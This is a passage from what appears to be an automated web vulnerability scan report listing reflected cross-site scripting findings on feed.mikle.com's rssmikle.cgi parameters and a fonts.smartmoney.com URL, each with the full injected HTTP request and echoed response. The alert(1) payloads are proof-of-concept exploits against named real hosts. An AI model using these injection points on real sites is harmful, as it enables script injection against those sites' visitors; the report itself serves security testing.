GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F8aede<script>alert(1)</script>3fd943d3e7b&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
derline;}
#header .feed_title a:active{color:#FFFFFF;text-decoration:none;}
#content{margin:0px;padding:5px 0px 0px 0px;background-color:#C6D0D2;background-image:url(http://8aede<script>alert(1)</script>3fd943d3e7b);}
#content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;}
#content .feed_item_title{margin:1px 0 1px 3px;padding:1px 2px 1px 3px;color:#0
...[SNIP]...

1.66. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_description_color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_description_color request parameter is copied into the HTML document as plain text between tags. The payload 82f71<script>alert(1)</script>911cbac5acb was submitted in the rssmikle_item_description_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%2366666682f71<script>alert(1)</script>911cbac5acb&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
82;text-decoration:none;}
#content .feed_item_podcast{margin:0 0 0 3px;padding:0 0 0 3px;}
#content .feed_item_description{margin:0 0 0 3px;padding:0 2px 0 3px;color:#66666682f71<script>alert(1)</script>911cbac5acb;line-height:135%;}
#footer{display:none;height:0px;margin:0px;padding:0px;color:#FFFFFF;background-color:#C6D0D2;background-image:url(http://);}
</style>
...[SNIP]...

1.67. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_podcast parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_podcast request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cdc5'%3balert(1)//de6c201b5f2 was submitted in the rssmikle_item_podcast parameter. This input was echoed as 5cdc5';alert(1)//de6c201b5f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon5cdc5'%3balert(1)//de6c201b5f2 HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
rseInt(str);
if(isNaN(num)){
return 0;
} else if(!num) {
return 0;
}
return num;
}

function init() {
var rssMikleType = '';
var anchorTarget = '_blank';
var itemPodcast = 'icon5cdc5';alert(1)//de6c201b5f2';

var containerObj = document.getElementById('container');
var headerObj = document.getElementById('header') ? document.getElementById('header') : "";
var contentObj = document.getElementById('
...[SNIP]...

1.68. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_item_title_color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_item_title_color request parameter is copied into the HTML document as plain text between tags. The payload 66512<script>alert(1)</script>2af99c2604f was submitted in the rssmikle_item_title_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%2300438266512<script>alert(1)</script>2af99c2604f&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
#content .feed_item{margin:0 0 7px 0;padding:0 0 7px 0;border-bottom:1px dashed #CCCCCC;}
#content .feed_item_title{margin:1px 0 1px 3px;padding:1px 2px 1px 3px;color:#00438266512<script>alert(1)</script>2af99c2604f;font-weight:bold;}
#content .feed_item_title a:link{color:#00438266512<script>
...[SNIP]...

1.69. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e227'%3balert(1)//699ffd7f0a5 was submitted in the rssmikle_target parameter. This input was echoed as 3e227';alert(1)//699ffd7f0a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank3e227'%3balert(1)//699ffd7f0a5&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
n strToInt(str) {
num = parseInt(str);
if(isNaN(num)){
return 0;
} else if(!num) {
return 0;
}
return num;
}

function init() {
var rssMikleType = '';
var anchorTarget = '_blank3e227';alert(1)//699ffd7f0a5';
var itemPodcast = 'icon';

var containerObj = document.getElementById('container');
var headerObj = document.getElementById('header') ? document.getElementById('header') : "";
var contentObj
...[SNIP]...

1.70. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fec0"><script>alert(1)</script>00a39daf45e was submitted in the rssmikle_target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank4fec0"><script>alert(1)</script>00a39daf45e&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="http://biz.yahoo.com/bw/110906/20110906005785.html?.v=1" target="_blank4fec0"><script>alert(1)</script>00a39daf45e">
...[SNIP]...

1.71. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_bgcolor parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_title_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload e21c2<script>alert(1)</script>91be55c18e9 was submitted in the rssmikle_title_bgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FFe21c2<script>alert(1)</script>91be55c18e9&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
ner{overflow:hidden;margin:0;padding:0;width:240px;height:230px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#0066FFe21c2<script>alert(1)</script>91be55c18e9;background-image:url(http://);}
#header .feed_title{margin:0;padding:0;font-weight:bold;}
#header .feed_title a:link{color:#FFFFFF;text-decoration:none;}
#hea
...[SNIP]...

1.72. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_bgimage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_title_bgimage request parameter is copied into the HTML document as plain text between tags. The payload 52655<script>alert(1)</script>74461a05d22 was submitted in the rssmikle_title_bgimage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F52655<script>alert(1)</script>74461a05d22&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
padding:0;width:240px;height:230px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFF;background-color:#0066FF;background-image:url(http://52655<script>alert(1)</script>74461a05d22);}
#header .feed_title{margin:0;padding:0;font-weight:bold;}
#header .feed_title a:link{color:#FFFFFF;text-decoration:none;}
#header .feed_title a:visited{col
...[SNIP]...

1.73. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_title_color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_title_color request parameter is copied into the HTML document as plain text between tags. The payload f76d5<script>alert(1)</script>a4e3224bec was submitted in the rssmikle_title_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFFf76d5<script>alert(1)</script>a4e3224bec&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
0;}
#container{overflow:hidden;margin:0;padding:0;width:240px;height:230px;font-size:14px;border:1px solid #CCCCCC;}
#header{margin:0px;padding:5px 5px 5px 5px;color:#FFFFFFf76d5<script>alert(1)</script>a4e3224bec;background-color:#0066FF;background-image:url(http://);}
#header .feed_title{margin:0;padding:0;font-weight:bold;}
#header .feed_title a:link{color:#FFFFFFf76d5<script>
...[SNIP]...

1.74. http://feed.mikle.com/feeds/rssmikle.cgi [rssmikle_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The value of the rssmikle_type request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8347c'%3balert(1)//a640d3a46b8 was submitted in the rssmikle_type parameter. This input was echoed as 8347c';alert(1)//a640d3a46b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Ffeeds.feedburner.com%2FOmvs-YahooNewsSearchResults&rssmikle_type=8347c'%3balert(1)//a640d3a46b8&rssmikle_frame_width=240&rssmikle_frame_height=230&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%230066FF&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23C6D0D2&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%23004382&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=100&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.omvssolar.com/investors.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=127943195.2017598590.1315103164.1315103164.1315103164.1; __utmz=127943195.1315103164.1.1.utmcsr=nationmultimedia.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/nt-widget/ann-feed.html

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:32:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
';
}
return tag;
}

function strToInt(str) {
num = parseInt(str);
if(isNaN(num)){
return 0;
} else if(!num) {
return 0;
}
return num;
}

function init() {
var rssMikleType = '8347c';alert(1)//a640d3a46b8';
var anchorTarget = '_blank';
var itemPodcast = 'icon';

var containerObj = document.getElementById('container');
var headerObj = document.getElementById('header') ? document.getElementById('
...[SNIP]...

1.75. http://fonts.smartmoney.com/k/fnb4igi-e.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.smartmoney.com
Path:   /k/fnb4igi-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 90094<script>alert(1)</script>f3f7caa5adf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

